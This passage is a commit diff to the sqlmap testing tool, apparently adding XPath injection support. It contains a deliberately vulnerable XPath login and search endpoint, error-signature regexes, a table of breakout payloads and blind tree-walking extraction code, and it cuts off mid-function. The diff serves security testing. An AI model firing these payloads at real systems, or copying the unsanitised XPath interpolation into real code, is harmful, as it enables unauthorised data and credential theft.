Adding switch --xpath

This commit is contained in:
Miroslav Štampar 2026-06-29 00:29:27 +02:00
parent 4c869817d4
commit 8ff5d3811a
12 changed files with 1242 additions and 9 deletions

View file

@ -108,7 +108,9 @@ jobs:
python -m coverage report --fail-under=50
- name: Smoke test
run: python sqlmap.py --smoke-test
run: |
python -m pip install -q lxml
python sqlmap.py --smoke-test
- name: Vuln test
run: python sqlmap.py --vuln-test

View file

@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py
a4d4ec8aaea6da7b20068209945cf46348bde74b4c90ddf630c3be820d16f73e extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py
256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py
0397a941e27fa23ef375b6bd0a654132b05496d78737253a58524aab7e840789 lib/controller/checks.py
e9fd898a38e4e1bfc975e44b41b344c190e58d845b8602a50a2bf05835ddc7c8 lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py
8b5d4d1f503ef7075820f7eca184c9e55386b7717c5cf93d195fa9e5332d9e34 lib/core/optiondict.py
e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py
21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py
77a4804887ae9dde7142ede91fcae1bd1d7369132f90d7bf095e8bad6f62e5a4 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py
fbfb3fa79ac0566a985b8cdc3a2e4758bdf4ccf9d94428163bfe6432c72d696b lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py
541b517c9cacba2b62122c1dc2be8f2808afdc32e715983edf29998433b531bb lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@ -249,6 +249,8 @@ e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py
ece1fca81148ccf3c5f13b6ad7fb64966cb1ebef245216eac5cb0dd2490989db lib/techniques/xpath/inject.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
@ -654,6 +656,7 @@ eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_use
2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py
93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py
81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py
c7584cad4f99416e6415744412941f5a47b2f5284270326624bd291edf6d9994 tests/test_xpath.py
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py

View file

@ -217,6 +217,84 @@ def nosql_match(params):
else: # $eq, $in (single-valued here) and any literal equality
return record == value
# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------
XPATH_XML = """<?xml version="1.0" encoding="UTF-8"?>
<directory>
<department name="IT Operations">
<user id="1">
<username>luther</username>
<realname>Luther Blisset</realname>
<email>luther@example.com</email>
<password>db3a16990a0008a3b04707fdef6584a0</password>
<role>System Administrator</role>
<location>London</location>
<phone>+1 555 0100</phone>
</user>
<user id="2">
<username>fluffy</username>
<realname>Fluffy Bunny</realname>
<email>fluffy@example.com</email>
<password>4db967ce67b15e7fb84c266a76684729</password>
<role>Security Engineer</role>
<location>Amsterdam</location>
<phone>+1 555 0102</phone>
</user>
<user id="3">
<username>wu</username>
<realname>Wu Ming</realname>
<email>wu@example.com</email>
<password>f5a2950eaa10f9e99896800eacbe8275</password>
<role>Network Administrator</role>
<location>Shanghai</location>
<phone>+86 21 555 0103</phone>
</user>
</department>
<department name="Engineering">
<user id="4">
<username>linus</username>
<realname>Linus Torvalds</realname>
<email>linus@example.com</email>
<password>8e7b6a5c4d321908f7e6d5c4b3a2910f</password>
<role>Kernel Developer</role>
<location>Portland</location>
<phone>+1 555 0200</phone>
</user>
<user id="5">
<username>ada</username>
<realname>Ada Lovelace</realname>
<email>ada@example.com</email>
<password>1a2b3c4d5e6f7081920a1b2c3d4e5f60</password>
<role>Algorithm Designer</role>
<location>London</location>
<phone>+44 20 555 0201</phone>
</user>
</department>
<department name="Management">
<user id="6">
<username>grace</username>
<realname>Grace Hopper</realname>
<email>grace@example.com</email>
<password>9e8d7c6b5a493827160e9d8c7b6a5948</password>
<role>CTO</role>
<location>New York</location>
<phone>+1 555 0300</phone>
</user>
</department>
</directory>"""
def _xpath_element_to_dict(el):
"""Convert an lxml element to a dict for JSON serialization."""
retVal = dict(el.attrib)
retVal["tag"] = el.tag
retVal["text"] = (el.text or "").strip()
children = []
for child in el:
children.append(_xpath_element_to_dict(child))
if children:
retVal["children"] = children
return retVal
_conn = None
_cursor = None
_lock = None
@ -889,6 +967,58 @@ class ReqHandler(BaseHTTPRequestHandler):
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == "/xpath/search":
self.send_response(OK)
self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
q = self.params.get("q", "")
entries = []
error = None
if q:
try:
from lxml import etree
root = etree.fromstring(XPATH_XML.encode("utf-8"))
# VULNERABLE: unsanitized user input directly interpolated into XPath
xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q)
elements = root.xpath(xpath_expr)
entries = [_xpath_element_to_dict(el) for el in elements]
except Exception as ex:
error = "%s: %s" % (type(ex).__name__, getUnicode(ex))
output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str)
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == "/xpath/login":
self.send_response(OK)
self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
username = self.params.get("username", "")
password = self.params.get("password", "")
error = None
authenticated = False
if username and password:
try:
from lxml import etree
root = etree.fromstring(XPATH_XML.encode("utf-8"))
# VULNERABLE: unsanitized interpolation into XPath login expression
xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password)
results = root.xpath(xpath_expr)
if results:
authenticated = True
except Exception as ex:
error = "%s: %s" % (type(ex).__name__, getUnicode(ex))
output = json.dumps({"authenticated": authenticated, "error": error}, default=str)
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)

View file

@ -83,6 +83,7 @@ from lib.core.settings import GRAPHQL_ERROR_REGEX
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import LDAP_ERROR_REGEX
from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
from lib.core.settings import IPS_WAF_CHECK_RATIO
from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
@ -1194,6 +1195,13 @@ def heuristicCheckSqlInjection(place, parameter):
if conf.beep:
beep()
if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""):
infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
kb.disableHtmlDecoding = False
kb.heuristicMode = False

View file

@ -543,6 +543,11 @@ def start():
ldapScan()
continue
if conf.xpath:
from lib.techniques.xpath.inject import xpathScan
xpathScan()
continue
if conf.nullConnection:
checkNullConnection()

View file

@ -120,6 +120,8 @@ optDict = {
"technique": "string",
"nosql": "boolean",
"graphql": "boolean",
"ldap": "boolean",
"xpath": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.188"
VERSION = "1.10.6.189"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -977,6 +977,44 @@ LDAP_FINGERPRINT_ATTRIBUTES = (
("vendorName", "Red Hat", "389 Directory Server"),
)
# XPath error signatures per parser implementation for error-based detection and
# fingerprinting (matched against HTTP response bodies). Each tuple is
# (backend_name, regex_fragment).
XPATH_ERROR_SIGNATURES = (
("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"),
("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"),
("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"),
("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"),
(".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"),
(".NET XPathNavigator", r"Expression must evaluate to a node-set"),
(".NET XPathNavigator", r"has an invalid (?:token|qualified name)"),
("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"),
("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"),
("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"),
("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"),
("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"),
("Saxon (standalone)", r"Static error\(s\) in query"),
("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"),
("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"),
("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"),
("eXist", r"exerr:ERROR"),
("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"),
("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"),
("Generic XPath", r"Invalid XPath|XPath evaluation failed"),
)
XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES)
# Printable-ASCII codepoint bounds bisected during XPath blind character extraction
XPATH_CHAR_MIN = 0x20
XPATH_CHAR_MAX = 0x7e
# Maximum tree depth for recursive XML walking during XPath blind extraction
XPATH_MAX_DEPTH = 32
# Upper bound for the value-length search during XPath blind extraction
XPATH_MAX_LENGTH = 256
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6

View file

@ -91,6 +91,7 @@ def vulnTest():
("-u \"<base>nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"<base>graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed)
("-u \"<base>ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing
("-u \"<base>xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"<direct>\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),

View file

@ -424,6 +424,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--ldap", dest="ldap", action="store_true",
help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)")
techniques.add_argument("--xpath", dest="xpath", action="store_true",
help="Test for XPath injection (error-based, boolean-blind, blind XML tree-walking)")
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)

View file

@ -0,0 +1,8 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
pass

View file

@ -0,0 +1,626 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import difflib
import re
import time
from collections import namedtuple
from lib.core.common import beep
from lib.core.common import randomStr
from lib.core.convert import getUnicode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import PLACE
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import XPATH_CHAR_MAX
from lib.core.settings import XPATH_CHAR_MIN
from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import XPATH_ERROR_SIGNATURES
from lib.core.settings import XPATH_MAX_DEPTH
from lib.core.settings import XPATH_MAX_LENGTH
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
SENTINEL = randomStr(length=10, lowercase=True)
XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST)
# Each detection breakout is paired with a false variant and an (optional) extraction
# boundary. The boundary carries a prefix/suffix pair that wraps the extraction
# predicate so the surrounding template stays syntactically valid.
#
# Breakouts are listed in detection-priority order: function-argument closers first,
# then simple string, double-quoted, union wildcard, and bare numeric/boolean.
_BREAKOUT_TABLE = (
# (breakout, false_variant, extraction_prefix, extraction_suffix )
# -- function-argument (closes paren + string) ------------------------------------------------------------
("') or true() or ('", "') and false() and ('", "') or ", " or ('"),
("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"),
("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"),
# -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched)
("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"),
("' or true() or '", "' and false() and '", "' or ", " and '1'='1"),
("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"),
# -- AND context (single-quoted) -------------------------------------------------------------------------
("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"),
# -- double-quoted string (suffix absorbs trailing quote) -------------------------------------------------
('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'),
('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'),
# -- double-quoted function-argument ---------------------------------------------------------------------
('") or true() or ("', '") and false() and ("', '") or ', ' or ("'),
# -- union wildcard (detection-only, no extraction) ------------------------------------------------------
("']|//*|test['", None, None, None),
# -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ----------
(" or 1=1", " and 1=2", " and ", ""),
(" or true()", " and false()", " and ", ""),
)
# Boundary: a verified injection boundary with an extraction prefix+suffix and an
# extractable flag. Only extractable boundaries can drive tree-walking.
Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable"))
# Convenience lookups built from _BREAKOUT_TABLE
_BREAKOUT_FALSE_MAP = {}
_BREAKOUT_BOUNDARY = {}
_BREAKOUT_LIST = []
for _entry in _BREAKOUT_TABLE:
_bk, _fv, _pfx, _sfx = _entry
_BREAKOUT_LIST.append(_bk)
_BREAKOUT_FALSE_MAP[_bk] = _fv
if _pfx is not None:
_BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True)
else:
_BREAKOUT_BOUNDARY[_bk] = None
XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST)
Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary"))
Slot.__new__.__defaults__ = (None, None, None, None, None, None, None)
def _ratio(first, second):
return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
def _delim(place):
return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'
def _confParameters(place):
try:
return conf.parameters.get(place, "")
except AttributeError:
return conf.parameters[place] if place in conf.parameters else ""
def _originalValue(place, parameter):
for segment in _confParameters(place).split(_delim(place)):
name, _, value = segment.partition('=')
if name.strip() == parameter:
return value
return conf.paramDict.get(place, {}).get(parameter) or ""
def _replaceSegment(place, parameter, value):
delimiter = _delim(place)
raw = _confParameters(place)
retVal, replaced = [], False
for part in raw.split(delimiter):
name, _, _ = part.partition('=')
if not replaced and name.strip() == parameter:
retVal.append("%s=%s" % (name, value))
replaced = True
else:
retVal.append(part)
if not replaced:
retVal = []
for name, oldValue in conf.paramDict.get(place, {}).items():
retVal.append("%s=%s" % (name, value if name == parameter else oldValue))
return delimiter.join(retVal)
def _send(place, parameter, value):
"""Issue a single HTTP request with the target parameter set to `value`.
Temporarily mutates conf.parameters so sqlmap's normal request machinery
(URL construction, cookies, headers, encodings) is fully preserved."""
if conf.delay:
time.sleep(conf.delay)
old_params = conf.parameters.get(place, "")
conf.parameters[place] = _replaceSegment(place, parameter, value)
try:
kwargs = {"raise404": False, "silent": True}
if conf.verbose >= 3:
logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))
page, _, _ = Request.getPage(**kwargs)
return page or ""
except Exception as ex:
logger.debug("XPath probe request failed: %s" % getUnicode(ex))
return ""
finally:
conf.parameters[place] = old_params
def _isError(page):
return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or "")))
def _backendFromError(page):
page = getUnicode(page or "")
for backend, regex in XPATH_ERROR_SIGNATURES:
if re.search(regex, page):
return backend
return "Generic XPath" if _isError(page) else None
def _probeBackendByParserError(place, parameter):
"""Probe for XPath parser errors to obtain a backend hint.
This is NOT authoritative detection -- only a boolean oracle confirms injection."""
original = _originalValue(place, parameter) or "x"
normal = _send(place, parameter, original)
for suffix in ("'", '"', "')", '")', "]", "|"):
payload = original + suffix
broken = _send(place, parameter, payload)
if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND:
continue
backend = _backendFromError(broken)
if backend and not _isError(normal):
return backend, payload
return None, None
def _boolean(truthy, falsy):
"""Return the reproducible true page when true/false probes diverge.
Both true AND false pages must be independently reproducible."""
truePage = truthy()
if truePage is None or _isError(truePage):
return None
truePage2 = truthy()
if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND:
return None
falsePage = falsy()
if falsePage is None or _isError(falsePage):
return None
falsePage2 = falsy()
if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND:
return None
if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
return truePage
return None
def _makePayload(original, boundary, predicate):
"""Construct a payload by inserting `predicate` into the verified boundary."""
if boundary.suffix:
return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix)
return "%s%s%s" % (original, boundary.prefix, predicate)
def _detectBoolean(place, parameter):
"""Return (template, payload, boundary) for boolean-blind XPath injection.
boundary is None for detection-only breakouts (wildcard, union)."""
original = _originalValue(place, parameter) or ""
for breakout in XPATH_BREAKOUT_PREFIXES:
truePayload = original + breakout
falseVariant = _BREAKOUT_FALSE_MAP.get(breakout)
if not falseVariant:
continue
falseSpecific = original + falseVariant
template = _boolean(lambda p=truePayload: _send(place, parameter, p),
lambda p=falseSpecific: _send(place, parameter, p))
if template:
boundary = _BREAKOUT_BOUNDARY.get(breakout)
return template, truePayload, boundary
# Wildcard: only useful for bool differentiation, not enumeration
if original:
template = _boolean(lambda: _send(place, parameter, "*"),
lambda: _send(place, parameter, SENTINEL))
if template:
return template, "*", None
return None, None, None
def _isPasswordParam(parameter):
parameter = getUnicode(parameter or "").lower()
return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth"))
def _fingerprintByError(backend):
if not backend:
return None
for name, _ in XPATH_ERROR_SIGNATURES:
if name in backend:
return name
return backend
def _xpathQuote(s):
"""Quote a string for an XPath string literal, choosing the delimiter that
requires no escaping. When both quotes appear, use concat()."""
s = getUnicode(s)
if "'" not in s:
return "'%s'" % s
if '"' not in s:
return '"%s"' % s
# both quote types present: use concat() with " as outer delimiter
return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"'))
class _XPathPayloadBuilder(object):
"""Build XPath boolean predicates for blind tree-walking using the verified
injection boundary from detection. Each method returns a complete payload."""
def __init__(self, original, boundary):
self.original = original or "x"
self.boundary = boundary
def _make(self, predicate):
return _makePayload(self.original, self.boundary, predicate)
def nameStartsWith(self, path, prefix):
return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix)))
def nameLength(self, path, length):
return self._make("string-length(name(%s))=%d" % (path, length))
def childCount(self, path, count):
return self._make("count(%s/*)>=%d" % (path, count))
def attributeCount(self, path, count):
return self._make("count(%s/@*)>=%d" % (path, count))
def attributeNameStartsWith(self, path, index, prefix):
return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))
def attributeValueStartsWith(self, path, index, prefix):
return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))
def textStartsWith(self, path, prefix):
return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix)))
def _makeOracle(place, parameter, template):
"""Build an oracle from a verified true template. extract(payload) returns
True when the response is closer to the true template than to the false page."""
cache = {}
def request(payload):
if payload not in cache:
cache[payload] = _send(place, parameter, payload)
return cache[payload]
falsePage = request(SENTINEL)
def oracle(payload):
page = request(payload)
if page is None or _isError(page):
return False
return _ratio(template, page) >= UPPER_RATIO_BOUND
def extract(payload):
page = request(payload)
if page is None or _isError(page):
return False
trueRatio = _ratio(template, page)
falseRatio = _ratio(falsePage, page)
# Require either an unambiguous match against the template or a
# clear separation from the false page (minimum 5 %pt margin)
return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05
oracle.extract = extract
oracle.template = template
oracle.falsePage = falsePage
oracle.cache = cache
return oracle
# Frequency-ordered charset for blind character extraction.
# Excludes characters that are XPath metacharacters or problematic in URL context.
_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/'))
_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) +
tuple(xrange(ord('A'), ord('Z') + 1)) +
tuple(xrange(ord('0'), ord('9') + 1)) +
tuple(ord(_) for _ in "@._-+ "))
_CHARSET = []
for _ in _FREQ:
if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET:
_CHARSET.append(_)
for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1):
if _ not in _META_ORDS and _ not in _CHARSET:
_CHARSET.append(_)
def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
"""Blindly infer a string value at `path` using `getter(builder, path, prefix)`.
Returns the recovered value or None."""
value = ""
probes = 0
for _ in xrange(maxLen):
found = False
for cp in _CHARSET:
candidate = value + chr(cp)
probes += 1
if oracle.extract(getter(builder, path, candidate)):
value = candidate
found = True
break
if not found:
break
if value.endswith(" "):
value = value.rstrip()
break
logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value)))
return value if value else None
def _inferCount(oracle, builder, path, countFn, maxCount=128):
"""Binary search for a count value using predicate 'count(...)>=N'."""
if not oracle.extract(countFn(builder, path, 1)):
return 0
lo, hi = 1, maxCount
while lo < hi:
mid = (lo + hi + 1) // 2
if oracle.extract(countFn(builder, path, mid)):
lo = mid
else:
hi = mid - 1
return lo
def _walkTree(oracle, builder, path="/*", depth=0):
"""Recursively walk the XML tree from a given XPath expression.
Returns a dict: {name, path, children, attributes, text} or None."""
if depth > XPATH_MAX_DEPTH:
return None
name = _inferValue(oracle, builder, path,
lambda b, p, prefix: b.nameStartsWith(p, prefix))
if not name:
return None
logger.info("discovered element: '%s'" % name)
childCount = _inferCount(oracle, builder, path,
lambda b, p, c: b.childCount(p, c),
maxCount=32)
attrCount = _inferCount(oracle, builder, path,
lambda b, p, c: b.attributeCount(p, c),
maxCount=16)
attributes = []
for i in xrange(1, attrCount + 1):
attrName = _inferValue(oracle, builder, path,
lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix))
if not attrName:
continue
attrValue = _inferValue(oracle, builder, path,
